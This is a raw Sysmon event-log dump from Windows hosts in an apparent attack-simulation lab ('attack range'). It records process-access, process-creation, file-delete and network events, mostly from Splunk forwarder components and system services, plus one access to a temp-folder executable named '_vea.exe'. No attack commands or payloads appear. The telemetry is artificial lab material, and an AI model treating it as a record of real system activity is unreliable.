10341000x8000000000000000297187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.080{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1732-6216-2007-000000003802}6724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.049{C8EA50B7-1732-6216-2007-000000003802}67246416C:\Windows\system32\conhost.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.002{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1732-6216-2007-000000003802}6724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.980{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1732-6216-2007-000000003802}6724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:00.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B3CA143F9EE15110AF7622F48939D31,SHA256=1EE1D422CD68D40D9190D90E32D455BCDD4BFAE372F72677E808553379E95009,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:57.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51626-false10.0.1.12-8000- 23542300x8000000000000000221108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:00.752{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=282625421BAD72D64A4F578910EC84D4,SHA256=B799C109B7D8B445A994209B12E9972853E0AC441FF1D77589B4373CB61F0E1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E29D2A57D6FE16235381DA4E7100FF5A,SHA256=82CFF5CD7562C69EE47185F0A14B2D9B99E99B988D85EA47B620FBC6C22F41F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:01.768{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0096DB2744EFD298D779E52931DBF5F,SHA256=505AA7FE60AF4F388EEA29441849CF37D5C1BB14D7D593DB2FE93738F5880AF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.601{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1735-6216-2107-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.600{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.600{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.600{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.600{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.599{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1735-6216-2107-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.598{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1735-6216-2107-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:01.597{C8EA50B7-1735-6216-2107-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:02.783{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ABCDED314EA5C2BE50ABA2CA2661932,SHA256=453DC737FB84F23E22105CF4F304AE7E5C0A3E08AC39FBEB22C430CF64B48D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.807{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCEB77E7E80AA29654FF64F21813EFE5,SHA256=D465BF6F8546BBA3C0BD4E3DC8627489A89F738D9C5ADBF7F0E790976FD78F63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.669{C8EA50B7-1736-6216-2207-000000003802}4805508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.182{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1736-6216-2207-000000003802}480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1736-6216-2207-000000003802}480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.166{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1736-6216-2207-000000003802}480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:02.168{C8EA50B7-1736-6216-2207-000000003802}480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:03.799{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE5CBCBF79BA4C6F101BBA637FCA9CB,SHA256=C79EFD67B85AADC765AD2263019F0F7CE9F4F6EAE672A0B94CA1454357434121,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.853{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577106AB78AF920744D25492373D2568,SHA256=38623DE48DCCD113590D861DC7250DB4E456DB835613E9D7B65CC2800FB7CEF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.769{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1737-6216-2307-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.753{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:03.753{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 